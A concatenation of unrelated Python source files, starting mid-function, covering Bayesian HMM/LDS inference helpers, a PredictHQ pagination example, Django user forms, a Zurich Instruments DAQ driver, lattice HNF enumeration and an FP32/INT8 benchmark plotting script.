E_z, sum_E_ztztp1T, _ = stats
T, K = E_z.shape
assert sum_E_ztztp1T.shape == (K, K)
out = 0
out += np.dot(E_z[0], np.log(pi_0))
out += np.sum(sum_E_ztztp1T * np.log(trans_matrix))
return out
def hmm_entropy(params, stats):
log_transmatrix, log_pi_0, aBl, _ = params
E_z, sum_E_ztztp1T, log_Z = stats
T, K = E_z.shape
assert aBl.shape == (T, K)
assert sum_E_ztztp1T.shape == (K, K)
assert log_transmatrix.shape == (K, K)
neg_entropy = np.sum(E_z[0] * log_pi_0)
neg_entropy += np.sum(E_z * aBl)
neg_entropy += np.sum(sum_E_ztztp1T * log_transmatrix)
neg_entropy -= log_Z
return -neg_entropy
def expected_gaussian_logprob(mu, sigma, stats):
D = mu.shape[0]
J = np.linalg.inv(sigma)
h = J.dot(mu)
muJmuT = mu.dot(J).dot(mu.T)
logdetJ = np.linalg.slogdet(J)[1]
x, xxT, n = stats
c1, c2 = ('i,i->', 'ij,ij->') if x.ndim == 1 \
else ('i,ni->n', 'ij,nij->n')
out = -1. / 2 * np.einsum(c2, J, xxT)
out += np.einsum(c1, h, x)
out += -n / 2. * muJmuT
out += -D / 2. * np.log(2 * np.pi) + n / 2. * logdetJ
return out
def expected_regression_log_prob(regression, stats):
if isinstance(regression, DiagonalRegression):
return expected_diag_regression_log_prob(
regression.A, regression.sigmasq_flat, stats)
elif isinstance(regression, Regression):
return expected_dense_regression_log_prob(
regression.A, regression.sigma, stats)
else:
raise Exception("Unrecognized regression object! {}".format(regression))
def expected_dense_regression_log_prob(A, Sigma, stats):
"""
Expected log likelihood of p(y | x) where
y ~ N(Ax, Sigma)
and expectation is wrt q(y,x). We only need expected
sufficient statistics E[yy.T], E[yx.T], E[xx.T], and n,
where n is the number of observations.
:param A: regression matrix
:param Sigma: observation covariance
:param stats: tuple (E[yy.T], E[yx.T], E[xx.T], n)
:return: E[log p(y | x)]
"""
yyT, yxT, xxT, n = stats[-4:]
contract = 'ij,nij->n' if yyT.ndim == 3 else 'ij,ij->'
D = A.shape[0]
Si = np.linalg.inv(Sigma)
SiA = Si.dot(A)
ASiA = A.T.dot(SiA)
out = -1. / 2 * np.einsum(contract, ASiA, xxT)
out += np.einsum(contract, SiA, yxT)
out += -1. / 2 * np.einsum(contract, Si, yyT)
out += -D / 2 * np.log(2 * np.pi) + n / 2. * np.linalg.slogdet(Si)[1]
return out
def expected_diag_regression_log_prob(A, sigmasq, stats):
"""
Expected log likelihood of p(y | x) where
y_{n,d} ~ N(a_d^\trans x_n, sigma_d^2)
and expectation is wrt q(y,x). We only need expected
sufficient statistics E[yy.T], E[yx.T], E[xx.T], and n,
where n is the number of observations.
:param A: regression matrix
:param sigma: diagonal observation variance
:param stats: tuple (E[yy.T], E[yx.T], E[xx.T], mask)
:return: E[log p(y | x)]
"""
D_out, D_in = A.shape
assert sigmasq.shape == (D_out,)
ysq, yxT, xxT, mask = stats[-4:]
T = ysq.shape[0]
assert ysq.shape == (T, D_out)
assert yxT.shape == (T, D_out, D_in)
# xxT has different shapes depending on whether or not data is missing
# with missing data, it is (T, Dout, Din, Din) since we need to mask
# off certain xxT pairs. If there's no mask, it's always the same for
# every output dimension. To make it easy, we just broadcast along
# the Dout dimension for the no-missing-data case.
if xxT.shape == (T, D_in, D_in):
xxT = xxT[:,None,:,:]
else:
assert xxT.shape == (T, D_out, D_in, D_in)
assert mask.shape == (T, D_out)
AAT = np.array([np.outer(a, a) for a in A])
n = mask.sum(1)
J_node = AAT[None, :, :, :] / sigmasq[None, :, None, None]
h_node = (mask / sigmasq)[:,:,None] * A[None, :, :]
out = -1 / 2. * np.sum(J_node * xxT, axis=(1, 2, 3))
out += np.sum(h_node * yxT, axis=(1, 2))
out += -1 / 2. * np.sum(mask / sigmasq * ysq, axis=1)
out += -n / 2. * np.log(2 * np.pi)
out += -1 / 2. * np.sum(mask * np.log(sigmasq), axis=1)
assert out.shape == (T,)
return out
def lds_entropy(info_params, stats):
# Extract the info params that make up the variational factor
J_init, h_init, log_Z_init, \
J_pair_11, J_pair_21, J_pair_22, h_pair_1, h_pair_2, log_Z_pair, \
J_node, h_node, log_Z_node = info_params
# Extract the expected sufficient statistics
_lds_normalizer, E_x, Var_x, E_xtp1_xtT = stats
E_x_xT = Var_x + E_x[:, :, None] * E_x[:, None, :]
contract = 'tij,tji->'
# Initial potential
nep = -1. / 2 * np.sum(J_init * E_x_xT[0])
nep += h_init.dot(E_x[0])
nep += log_Z_init
# Pair potentials
nep += -1. / 2 * np.einsum(contract, J_pair_22, E_x_xT[1:])
nep += - np.einsum(contract, np.swapaxes(J_pair_21, 1, 2), E_xtp1_xtT)
nep += -1. / 2 * np.einsum(contract, J_pair_11, E_x_xT[:-1])
nep += np.sum(h_pair_1 * E_x[:-1])
nep += np.sum(h_pair_2 * E_x[1:])
nep += np.sum(log_Z_pair)
# Node potentials -- with single emission, J_node is 2D
nep += -1. / 2 * np.einsum(
'tij,tji->' if J_node.ndim == 3 else 'ij,tji->', J_node, E_x_xT)
nep += np.sum(h_node * E_x)
nep += np.sum(log_Z_node)
# Normalizer
nep += -_lds_normalizer
return -nep
def symmetric_blk_tridiagonal_logdet(diagonal_array, off_diagonal_array):
T = len(diagonal_array)
n = diagonal_array.shape[1]
J = np.zeros((T * n, T * n))
for t in np.arange(T):
J[t * n: t * n + n, t * n: t * n + n] = diagonal_array[t]
for t in np.arange(T-1):
J[t * n: t * n + n, t * n + n: t * n + 2 * n] += off_diagonal_array[t].T
J[t * n + n: t * n + 2 * n, t * n: t * n + n] += off_diagonal_array[t]
return np.linalg.slogdet(J)[1]
def test_lds_entropy(info_params):
# Extract the info params that make up the variational factor
J_init, h_init, log_Z_init, \
J_pair_11, J_pair_21, J_pair_22, h_pair_1, h_pair_2, log_Z_pair, \
J_node, h_node, log_Z_node = info_params
T, D = h_node.shape
# Compute the variational entropy by constructing the full Gaussian params.
diagonal_array = J_node.copy()
diagonal_array[0] += J_init
diagonal_array[:-1] += J_pair_11
diagonal_array[1:] += J_pair_22
off_diagonal_array = J_pair_21.copy()
ve = -1. / 2 * symmetric_blk_tridiagonal_logdet(diagonal_array, off_diagonal_array)
ve += 1. / 2 * T * D * (1 + np.log(2 * np.pi))
return ve
def gaussian_map_estimation(stats, gaussian):
D = gaussian.D
x, xxT, n = stats
# Add "pseudocounts" from the prior
mu_0, sigma_0, kappa_0, nu_0 = \
gaussian.mu_0, gaussian.sigma_0, gaussian.kappa_0, gaussian.nu_0
xxT += sigma_0 + kappa_0 * np.outer(mu_0, mu_0)
x += kappa_0 * mu_0
n += nu_0 + 2 + D
# SVD is necessary to check if the max likelihood solution is
# degenerate, which can happen in the EM algorithm
if n < D or (np.linalg.svd(xxT, compute_uv=False) > 1e-6).sum() < D:
raise Exception("Can't to MAP when effective observations < D")
# Set the MAP params
gaussian.mu = x / n
gaussian.sigma = xxT / n - np.outer(gaussian.mu, gaussian.mu)
def regression_map_estimation(stats, regression):
D_out = regression.D_out
# Add prior and likelihood statistics
if isinstance(regression, DiagonalRegression):
regression.max_likelihood(data=None, stats=stats)
else:
sum_tuples = lambda lst: list(map(sum, zip(*lst)))
yyT, yxT, xxT, n = sum_tuples([stats, regression.natural_hypparam])
A = np.linalg.solve(xxT, yxT.T).T
sigma = (yyT - A.dot(yxT.T)) / n
# Make sure sigma is symmetric
symmetrize = lambda A: (A + A.T) / 2.
sigma = 1e-10 * np.eye(D_out) + symmetrize(sigma)
regression.A = A
regression.sigma = sigma
def gaussian_logprior(gaussian):
D = gaussian.D
mu, sigma = gaussian.mu, gaussian.sigma
mu_0, sigma_0, kappa_0, nu_0 = \
gaussian.mu_0, gaussian.sigma_0, gaussian.kappa_0, gaussian.nu_0
# Inverse Wishart IW(sigma | sigma_0, nu_0)
from pybasicbayes.util.stats import invwishart_log_partitionfunction
lp = invwishart_log_partitionfunction(sigma_0, nu_0)
lp += -(nu_0 + D + 1) / 2.0 * np.linalg.slogdet(sigma)[1]
lp += -0.5 * np.trace(np.linalg.solve(sigma, sigma_0))
# Normal N(mu | mu_0, Sigma / kappa_0)
from scipy.linalg import solve_triangular
S_chol = np.linalg.cholesky(sigma / kappa_0)
x = solve_triangular(S_chol, mu - mu_0, lower=True)
lp += -1. / 2. * np.dot(x, x) \
- D / 2 * np.log(2 * np.pi) \
- np.log(S_chol.diagonal()).sum()
return lp
def regression_logprior(regression):
if isinstance(regression, DiagonalRegression):
return diag_regression_logprior(regression)
elif isinstance(regression, Regression):
return dense_regression_logprior(regression)
def diag_regression_logprior(regression):
from scipy.stats import multivariate_normal, gamma
A = regression.A
sigmasq = regression.sigmasq_flat
J, h, alpha, beta = \
regression.J_0, regression.h_0, regression.alpha_0, regression.beta_0
Sigma = np.linalg.inv(J)
mu = Sigma.dot(h)
lp = 0
for d in range(regression.D_out):
lp += multivariate_normal(mu, Sigma).logpdf(A[d])
lp += gamma(alpha, scale=1./beta).logpdf(1. / sigmasq[d])
return lp
def dense_regression_logprior(regression):
A = regression.A
Sigmainv = np.linalg.inv(regression.sigma)
Sigmainv_A = Sigmainv.dot(A)
AT_Sigmainv_A = A.T.dot(Sigmainv_A)
logdetSigmainv = np.linalg.slogdet(Sigmainv)[1]
A, B, C, d = regression.natural_hypparam
bilinear_term = -1./2 * np.trace(A.dot(Sigmainv)) \
+ np.trace(B.T.dot(Sigmainv_A)) \
- 1./2 * np.trace(C.dot(AT_Sigmainv_A)) \
+ 1./2 * d * logdetSigmainv
# log normalizer term
from pybasicbayes.util.stats import mniw_log_partitionfunction
Z = mniw_log_partitionfunction(
*regression._natural_to_standard(regression.natural_hypparam))
return bilinear_term - Z
|
1619711
|
from predicthq import Client
# Please copy paste your access token here
# or read our Quickstart documentation if you don't have a token yet
# https://docs.predicthq.com/guides/quickstart/
ACCESS_TOKEN = 'abc123'
phq = Client(access_token=ACCESS_TOKEN)
# broadcasts and events endpoints use the same approach for search pagination.
# The following examples are on the events endpoint but you can reuse them
# for the broadcasts endpoint.
# By default the search() method only returns the first
# page of results, with a default page size of 10.
# It's because the default values for the offset and limit parameters
# are respectively 0 and 10.
for event in phq.events.search():
print(event.rank, event.category, event.title, event.start.strftime('%Y-%m-%d'))
# You can modify this behaviour by specifying an offset and/or a limit.
# The following example skips the first 10 results (offset=10)
# and limits the results to 5 items (limit=5).
for event in phq.events.search(offset=10, limit=5):
print(event.rank, event.category, event.title, event.start.strftime('%Y-%m-%d'))
# You can then iterate over the search results set by continuously
# incrementing the offset by the limit value step.
search_params = {
'category': 'sports',
'start': {'gte': '2018-05-01', 'lte': '2018-06-30'},
'within': '10km@-36.844480,174.768368'
}
results_count = phq.events.count(**search_params).count
print(f'Results count: {results_count}')
search_params_with_offset_limit = {**search_params, **{'offset': '0', 'limit': '10'}}
for offset in range(0, results_count, 10):
for event in phq.events.search(**search_params_with_offset_limit):
print(event.rank, event.category, event.title, event.start.strftime('%Y-%m-%d'))
# The Python SDK provides helpers for iterating over the results pages.
# You can chain the iter_all() generator to iterate over all your results.
for event in phq.events.search(**search_params).iter_all():
print(event.rank, event.category, event.title, event.start.strftime('%Y-%m-%d'))
# There is a maximum number of results returned by a single search query
# (currently set at 100k results). Paginating won't allow you to go beyond
# this limit.
# The overflow field will inform on you whether you are above this limit or not.
# If that's the case, you need to refine your query to get a smaller set of results
# (e.g. add a `start` or `updated` parameter, add a `category`, etc.).
# If you are likely to get above this limit, it's a good idea to add a test
# and potentially raise in your code.
event_result_set_without_filters = phq.events.search()
if event_result_set_without_filters.overflow is True:
raise RuntimeError("Result set overflowed")
|
1619741
|
from .betfairstream import BetfairStream, HistoricalStream, HistoricalGeneratorStream
from .listener import BaseListener, StreamListener
from .stream import MarketStream, OrderStream
|
1619762
|
from __future__ import annotations
from django import forms
from django.contrib.auth.forms import UserChangeForm as BaseUserChangeForm
from django.contrib.auth.forms import UserCreationForm as BaseUserCreationForm
from jcasts.shared.typedefs import User
class UserChangeForm(BaseUserChangeForm):
class Meta(BaseUserChangeForm.Meta):
model = User
class UserCreationForm(BaseUserCreationForm):
class Meta(BaseUserCreationForm.Meta):
model = User
class UserPreferencesForm(forms.ModelForm):
class Meta:
model = User
fields: tuple[str, ...] = ("send_email_notifications",)
help_texts: dict[str, str] = {
"send_email_notifications": "I'd like to receive notications of new content and recommendations.",
}
|
1619791
|
import time
import numpy as np
from typing import List, Dict
from .base import BaseInstrument
from zhinst.toolkit.control.node_tree import Parameter
from zhinst.toolkit.interface import LoggerModule
_logger = LoggerModule(__name__)
MAPPINGS = {
"edge": {1: "rising", 2: "falling", 3: "both"},
"eventcount_mode": {0: "sample", 1: "increment"},
"fft_window": {
0: "rectangular",
1: "hann",
2: "hamming",
3: "blackman",
16: "exponential",
17: "cosine",
17: "sine",
18: "cosine_squared",
},
"grid_direction": {0: "forward", 1: "reverse", 2: "bidirectional"},
"grid_mode": {1: "nearest", 2: "linear", 4: "exact"},
"save_fileformat": {0: "matlab", 1: "csv", 2: "zview", 3: "sxm", 4: "hdf5"},
"type": {
0: "continuous",
1: "edge",
2: "dio",
3: "pulse",
4: "tracking",
5: "change",
6: "hardware",
7: "tracking_pulse",
8: "eventcount",
},
}
class DAQModule:
"""Implements a :class:`Data Acquisition Module` for Lock-In instruments.
The data acquisition module is a powerful tool that builds on top of LabOne.
It allows for triggered acquisition of multiple data streams on an
equidistant temporal grid. For more information on how to use the DAQ
Module, have a look at the LabOne Programming Manual.
This base class is overwritten by device specific DAQ classes with
additional signal sources and types. After setup, the nodetree of the module
is retrieved from the API and added to the DAQModule object attributes as
`zhinst-toolkit` :class:`Parameters`.
In a typical measurement using the DAQ Module one would first configure its
trigger and grid settings.
>>> # configure a measurement
>>> mfli.daq.fft_window("rectangular")
>>> mfli.daq.type("continuous")
>>> mfli.daq.grid_cols(512)
>>> mfli.daq.grid_rows(10)
The signal streams that are available for acquisition can be listed using
`signals_list(...)`.
>>> # list available signal sources ...
>>> mf.daq.signals_list()
['auxin0', 'demod0', 'demod1', 'imp0']
>>> # ... and according singal types
>>> mf.daq.signals_list("demod1")
['x', 'y', 'r', 'xiy', 'theta', 'frequency', 'auxin0', 'auxin1', 'dio']
To specify which signals should be acquired during the measurement, they
need to be added to the measurement. This is done with the
`signals_add(...)` method. Note that the return value is a string with the
exact node path that will be subscribed to during the measurement. The
string can be used later as a key in the `results` dictionary.
>>> # add signals to the measurement
>>> mf.daq.signals_clear()
>>> signal1 = mf.daq.signals_add("demod1", "r") # specify signal_source and signal_type
>>> signal2 = mf.daq.signals_add("demod1", "theta")
>>> signal3 = mf.daq.signals_add("demod1", "xiy", fft=True)
The measurement is started ...
>>> # start the measurement
>>> mf.daq.measure()
subscribed to: /dev3337/demods/0/sample.r.avg
subscribed to: /dev3337/demods/0/sample.theta.avg
subscribed to: /dev3337/demods/0/sample.xiy.fft.abs.avg
Progress: 0.0%
Progress: 40.0%
...
... and afterwards the results can be found in the `results` attribute of
the :class:`DAQModule`. The values in the dictionary are of type
:class:`DAQResults`.
>>> # retrieve the measurement results
>>> result1 = mf.daq.results[signal1]
>>> result2 = mf.daq.results[signal2]
>>> result3 = mf.daq.results[signal3]
>>> ...
>>> result1
<zhinst.toolkit.control.drivers.base.daq.DAQResult object at 0x0000023B8467D588>
path: /dev3337/demods/0/sample.xiy.fft.abs.avg
value: (10, 511)
frequency: (511,)
See below for details on
:class:`zhinst.toolkit.control.drivers.base.daq.DAQResult`.
Attributes:
signals (list): A list of node strings of signals that are added to the
measurement and will be subscribed to before data acquisition.
results (dict): A dictionary with signal strings as keys and
:class:`zhinst.toolkit.control.drivers.base.daq.DAQResult` objects
as values that hold all the data of the measurement result.
"""
def __init__(self, parent: BaseInstrument, clk_rate: float = 60e6) -> None:
self._parent = parent
self._module = None
self._signals = []
self._results = {}
self._clk_rate = clk_rate
# the `streaming_nodes` are used as all available signal sources for the data acquisition
self._signal_sources = self._parent._get_streamingnodes()
self._signal_types = {
"auxin": {"auxin1": ".Auxin0", "auxin2": ".Auxin1"},
"demod": {
"x": ".X",
"y": ".Y",
"r": ".R",
"xiy": ".xiy",
"theta": ".Theta",
"frequency": ".Frequency",
"auxin0": ".AuxIn0",
"auxin1": ".AuxIn1",
"dio": ".Dio",
},
"imp": {
"real": ".RealZ",
"imag": ".ImagZ",
"abs": ".AbsZ",
"phase": ".PhaseZ",
"frequency": ".Frequency",
"param0": ".Param0",
"param1": ".Param1",
},
"cnt": {"": ".Value"},
"pid": {"": ""},
}
self._trigger_signals = {}
self._trigger_types = {}
def _setup(self) -> None:
self._module = self._parent._controller.connection.daq_module
# add all parameters from nodetree
nodetree = self._module.get_nodetree("*")
for k, v in nodetree.items():
name = k[1:].replace("/", "_")
mapping = MAPPINGS[name] if name in MAPPINGS.keys() else None
setattr(self, name, Parameter(self, v, device=self, mapping=mapping))
self._init_settings()
def _set(self, *args, **kwargs):
if kwargs.get("sync", False):
_logger.warning(
"The daq module does not support the `sync` flag."
)
if self._module is None:
_logger.error(
"This DAQ is not connected to a dataAcquisitionModule!",
_logger.ExceptionTypes.ToolkitConnectionError,
)
return self._module.set(*args, device=self._parent.serial)
def _get(self, *args, valueonly: bool = True):
if self._module is None:
_logger.error(
"This DAQ is not connected to a dataAcquisitionModule!",
_logger.ExceptionTypes.ToolkitConnectionError,
)
data = self._module.get(*args, device=self._parent.serial)
return list(data.values())[0][0] if valueonly else data
def _init_settings(self):
self._set("preview", 1)
self._set("historylength", 10)
self._set("bandwidth", 0)
self._set("hysteresis", 0.01)
self._set("level", 0.1)
self._set("clearhistory", 1)
self._set("bandwidth", 0)
def trigger_list(self, source=None) -> List:
"""Returns a list of all the available signal sources for triggering.
Keyword Arguments:
source (str): specifies the signal source to return signal types
(default: None)
Returns:
Returns all available trigger sources by default. If the keyword is
specified with one of the trigger sources, all the available trigger
types for the trigger source are returned.
"""
sources = list(self._trigger_signals.keys())
if source is None:
return sources
else:
for signal in self._trigger_types.keys():
if signal in source:
return list(self._trigger_types[signal].keys())
def trigger(self, trigger_source: str, trigger_type: str) -> None:
"""Sets the trigger signal of the *DAQ Module*.
This method can be used to specify the signal used to trigger the data
acquisition. Use the method `trigger_list()` to see the available
trigger signal sources and types.The trigger node can also be set
directly using the module Parameter `triggernode`.
Arguments:
trigger_source (str): A string that specifies the source of the
trigger signal, e.g. "demod0".
trigger_trype (str): A string that specifies the type of the
trigger signal, e.g. "trigin1".
"""
trigger_node = self._parse_trigger(trigger_source, trigger_type)
self._set("/triggernode", trigger_node)
print(f"set trigger node to '{trigger_node}'")
def signals_list(self, source=None) -> List:
"""Returns a list of all the available signal sources for data acquisition.
Keyword Arguments:
source (str): specifies the signal source to return signal types
(default: None)
Returns:
Returns all available signal sources by default. If the keyword is
specified with one of the signal sources, all the available signal
types for the signal source are returned.
"""
sources = list(self._signal_sources.keys())
if source is None:
return sources
else:
for signal in self._signal_types.keys():
if signal in source:
return list(self._signal_types[signal].keys())
else:
return sources
def signals_add(
self,
signal_source: str,
signal_type: str = "",
operation: str = "avg",
fft: bool = False,
complex_selector: str = "abs",
) -> str:
"""Add a signal to the signals list to be subscribed to during measurement.
The specified signal is added to the property *signals* list. On
`measure()`, the *DAQ Module* subscribes to all the signal nodes in the
list.
Arguments:
signal_source (str): The source of the signal, e.g. 'demod0'. See
`signals_list()` for available signals.
Keyword Arguments:
signal_type (str): The type of the signal. Depends on the given
source, e.g. for demod signals the types'X', 'Y', 'R', 'Theta',
... are available. See `signals_list({signal source})` for
available signal types. (default: "")
operation (str): The operation that is performed on the acquired
signal, e.g. the average of data points ('avg'), the standard
deviation of the signal ('std') or single points ('replace').
(default: "avg")
fft (bool): A flag to enable the fourier transform (FFT) of the
acquired signal. (default: False)
complex_selector (str): If the FFT is enabled, this selects the
complex value of the result, e.g. 'abs', 'phase', 'real',
'imag'. (default: "abs")
Returns:
A string with the exact signal node that will be acquired during the
measurement. It can be used as a key in the `results` dict to
retrieve the measurement result corresponding to this signal, e.g.
>>> signal = mfli.daq.signal_add("demod0", "r")
/dev3337/demods/0/sample.r.avg
>>> mfli.daq.measure()
>>> ...
>>> result = mfli.daq.results[signal]
"""
signal_node = self._parse_signals(
signal_source, signal_type, operation, fft, complex_selector
)
if signal_node not in self.signals:
self._signals.append(signal_node)
return signal_node
def signals_clear(self) -> None:
"""Resets the signals list."""
self._signals = []
def measure(self, verbose: bool = True, timeout: float = 20) -> None:
"""Performs the measurement.
Starts a measurement and stores the result in `daq.results`. This
method subscribes to all the paths previously added to `daq.signals`,
then starts the measurement, waits until the measurement in finished
and eventually reads the result.
Keyword Arguments:
verbose (bool): A flag to enable or disable console output during
the measurement. (default: True)
timeout (int): The measurement will be stopped after the timeout.
The value is given in seconds. (default: 20)
Raises:
TimeoutError: if the measurement is not completed before
timeout.
"""
self._set("endless", 0)
self._set("clearhistory", 1)
for path in self.signals:
self._module.subscribe(path)
if verbose:
print(f"subscribed to: {path}")
self._module.execute()
tik = time.time()
while not self._module.finished():
if verbose:
print(f"Progress: {(self._module.progress()[0] * 100):.1f}%")
time.sleep(0.5)
tok = time.time()
if tok - tik > timeout:
_logger.error(
f"DAQ Module: Measurement timed out!",
_logger.ExceptionTypes.TimeoutError,
)
if verbose:
print("Finished")
result = self._module.read(flat=True)
self._module.finish()
self._module.unsubscribe("*")
self._get_result_from_dict(result)
def _parse_signals(
self,
signal_source: str,
signal_type: str,
operation: str,
fft: bool,
complex_selector: str,
) -> str:
signal_node = "/" + self._parent.serial
signal_node += self._parse_signal_source(signal_source)
signal_node += self._parse_signal_type(signal_type, signal_source)
signal_node += self._parse_fft(fft, complex_selector)
signal_node += self._parse_operation(operation)
return signal_node.lower()
def _parse_signal_source(self, source: str) -> str:
source = source.lower()
if source not in self._signal_sources:
_logger.error(
f"Signal source must be in {self._signal_sources.keys()}",
_logger.ExceptionTypes.ToolkitError,
)
return self._signal_sources[source]
def _parse_signal_type(self, signal_type: str, signal_source: str) -> str:
signal_source = signal_source.lower()
signal_type = signal_type.lower()
types = {}
for signal in self._signal_types.keys():
if signal in signal_source:
types = self._signal_types[signal]
if signal_type not in types.keys():
_logger.error(
f"Signal type must be in {types.keys()}",
_logger.ExceptionTypes.ToolkitError,
)
return types[signal_type]
def _parse_operation(self, operation: str) -> str:
operations = ["replace", "avg", "std"]
if operation not in operations:
_logger.error(
f"Operation must be in {operations}",
_logger.ExceptionTypes.ToolkitError,
)
if operation == "replace":
operation = ""
return f".{operation}"
def _parse_fft(self, fft: bool, selector: str) -> str:
if fft:
selectors = ["real", "imag", "abs", "phase"]
if selector not in selectors:
_logger.error(
f"Operation must be in {selectors}",
_logger.ExceptionTypes.ToolkitError,
)
return f".fft.{selector}"
else:
return ""
def _parse_trigger(self, trigger_source: str, trigger_type: str) -> str:
trigger_node = "/" + self._parent.serial
trigger_node += self._parse_trigger_source(trigger_source)
trigger_node += self._parse_trigger_type(trigger_source, trigger_type)
return trigger_node
def _parse_trigger_source(self, source: str) -> str:
source = source.lower()
sources = self._trigger_signals
if source not in sources:
_logger.error(
f"Signal source must be in {sources.keys()}",
_logger.ExceptionTypes.ToolkitError,
)
return sources[source]
def _parse_trigger_type(self, trigger_source: str, trigger_type: str) -> str:
trigger_source = trigger_source.lower()
trigger_type = trigger_type.lower()
types = {}
for signal in self._trigger_types.keys():
if signal in trigger_source:
types = self._trigger_types[signal]
if trigger_type.lower() not in types.keys():
_logger.error(
f"Signal type must be in {types.keys()}",
_logger.ExceptionTypes.ToolkitError,
)
return types[trigger_type]
def _get_result_from_dict(self, result: Dict):
self._results = {}
for node in self.signals:
node = node.lower()
if node not in result.keys():
_logger.error(
f"The signal {node} is not in {list(result.keys())}",
_logger.ExceptionTypes.ToolkitError,
)
self._results[node] = DAQResult(
node, result[node][0], clk_rate=self._clk_rate
)
def __repr__(self):
s = super().__repr__()
s += "\n\nsignals:\n"
for signal in self.signals:
s += f" - '{signal}'\n"
s += "parameters:\n"
for key, value in self.__dict__.items():
if isinstance(value, Parameter):
s += f" - {key}\n"
return s
@property
def signals(self):
return self._signals
@property
def results(self):
return self._results
class DAQResult:
"""A wrapper class around the result of a DAQ Module measurement.
The Data Acquisition Result class holds all measurement information returned
from the API. The attribute `value` is a two-dimensional numpy array with
the measured data along the measured grid. Depending on whether the time
trace or the FFT of a signal was acquired, either the `time` of `frequency`
attribute holds a 1D numpy array with the correct axis values calculated
from the measurement grid.
>>> signal = mf.daq.signals_add("demod1", "r")
>>> mf.daq.measure()
...
>>> result = mf.daq.results[signal]
>>> result
<zhinst.toolkit.control.drivers.base.daq.DAQResult object at 0x0000023B8467D588>
path: /dev3337/demods/0/sample.r.avg
value: (10, 511)
time: (511,)
>>> result.header
{'systemtime': array([1585136936490779], dtype=uint64),
'createdtimestamp': array([548560038356], dtype=uint64),
'changedtimestamp': array([548669852116], dtype=uint64),
'flags': array([1977], dtype=uint32),
...
>>> plt.imshow(result.value, extent=[result.time[0], result.time[-1], 0, result.shape[0]])
Attributes:
value (array): A 2D numpy array with the measurement result.
shape (tuple): A tuple with the shape of the acquired data which
corresponds to the according grid settings.
time (array): A 1D numpy array containing the time axis of the
measurement in seconds. Calculated from the returned timestamps
using the DAC clock rate. If the result is a Fourier transform this
value is `None`.
frequency (array): A 1D numpy array with the frequency values for FFT
measurements in Hertz. If the signal is not a FFT this value is
`None` The frequency grid is calculated from the grid settings. If
the "xiy" complex signal of the demodulator data stream is acquired,
the frequency spectrum is symmetric around 0 Hz, otherwise it is
positive.
header (dict): A dictionary containing all information about the
measurement settings.
"""
def __init__(self, path: str, result_dict: Dict, clk_rate: float = 60e6) -> None:
self._path = path
self._clk_rate = clk_rate
self._is_fft = "fft" in self._path
self._result_dict = result_dict
self._header = self._result_dict.get("header", {})
self._value = self._result_dict.get("value")
self._time = None
self._frequencies = None
if not self._is_fft:
self._time = self._claculate_time()
else:
self._frequency = self._calculate_freqs()
@property
def value(self):
return self._value
@property
def header(self):
return self._header
@property
def time(self):
return self._time
@property
def frequency(self):
return self._frequency
@property
def shape(self):
return self._value.shape
def _claculate_time(self):
timestamp = self._result_dict["timestamp"]
return (timestamp[0] - timestamp[0][0]) / self._clk_rate
def _calculate_freqs(self):
bin_count = len(self.value[0])
bin_resolution = self.header["gridcoldelta"]
frequencies = np.arange(bin_count)
bandwidth = bin_resolution * len(frequencies)
frequencies = frequencies * bin_resolution
if "xiy" in self._path:
frequencies = frequencies - bandwidth / 2.0 + bin_resolution / 2.0
return frequencies
def __repr__(self):
s = super().__repr__()
s += "\n\n"
s += f"path: {self._path}\n"
s += f"value: {self._value.shape}\n"
if self._is_fft:
s += f"frequency: {self._frequency.shape}\n"
else:
s += f"time: {self._time.shape}\n"
return s
|
1619798
|
def so_32(n):
"""Finds the symmetry preserving HNFs for the simple orthorhombic lattices
with a determinant of n. Assuming A = [[1,0,0],[0,2,0],[0,0,3]].
Args:
n (int): The determinant of the HNFs.
Returns:
srHNFs (list of lists): The symmetry preserving HNFs.
"""
from opf_python.universal import get_HNF_diagonals
diags = get_HNF_diagonals(n)
srHNFs = []
for diag in diags:
a = diag[0]
c = diag[1]
f = diag[2]
#beta1 condition
if c%2==0:
bs = [0,c/2]
else:
bs = [0]
#gamma1 and gamma2 condition
if f%2==0:
ed_vals = [0,f/2]
else:
ed_vals = [0]
for b in bs:
for e in ed_vals:
#gamma1 condition
if (2*b*e)%(f*c)==0:
for d in ed_vals:
HNF = [[a,0,0],[b,c,0],[d,e,f]]
srHNFs.append(HNF)
return srHNFs
|
1619816
|
from pkg_resources import DistributionNotFound
from pkg_resources import get_distribution
try:
__version__ = get_distribution(__name__).version
except DistributionNotFound:
pass
from .koopman import Koopman
from .koopman_continuous import KoopmanContinuous
__all__ = [
"Koopman",
"KoopmanContinuous",
"common",
"differentiation",
"observables",
"regression",
]
|
1619826
|
import json
import matplotlib.pyplot as plt
def autolabel(ax, rects):
"""
Attach a text label above each bar displaying its height
"""
for rect in rects:
height = rect.get_height()
ax.text(rect.get_x() + rect.get_width()/2., 1.05*height,
'%0.4f' % float(height),
ha='center', va='bottom')
def draw_bar(x, t, y, subplot, color, x_lab, y_lab, width=0.2):
plt.subplot(subplot)
plt.xticks(x, t)
ax1 = plt.gca()
ax1.set_xlabel(x_lab)
ax1.set_ylabel(y_lab, color=color)
rects1 = ax1.bar(x, y, color=color, width=width)
ax1.tick_params(axis='y', labelcolor=color)
autolabel(ax1, rects1)
def fix_len(name, length):
if len(name)<length:
name+=(" "*(length-len(name)))
return name
def format_print(name, values):
[a, b] =values
a=str(a)
b=str(b)
name = fix_len(name, 16)
a = fix_len(a, 24)
b = fix_len(b, 24)
print("{}{}{}".format(name, a, b))
def load_res(json_file):
with open(json_file) as f:
data = json.load(f)
return data
res_32 = load_res('./fp32.json')
res_8 = load_res('./int8.json')
#accuracys = [res_32['accuracy'], res_8['accuracy']]
throughputs = [res_32['throughput'], res_8['throughput']]
latencys = [res_32['latency'], res_8['latency']]
format_print('Model', ['FP32', 'INT8'])
format_print('throughput(fps)', throughputs)
format_print('latency(ms)', latencys)
#format_print('accuracy(%)', accuracys)
#accuracys_perc = [accu*100 for accu in accuracys]
t = ['FP32', 'INT8']
x = [0, 1]
plt.figure(figsize=(16,6))
draw_bar(x, t, throughputs, 131, 'tab:green', 'Throughput(fps)', '', width=0.2)
draw_bar(x, t, latencys, 132, 'tab:blue', 'Latency(ms)', '', width=0.2)
#draw_bar(x, t, accuracys_perc, 133, '#28a99d', 'Accuracys(%)', '', width=0.2)
plt.savefig("fp32_int8_aboslute.png")
print("\nSave to fp32_int8_aboslute.png\n")
throughputs_times = [1, throughputs[1]/throughputs[0]]
latencys_times = [1, latencys[1]/latencys[0]]
#accuracys_times = [1, accuracys_perc[1]/accuracys_perc[0]]
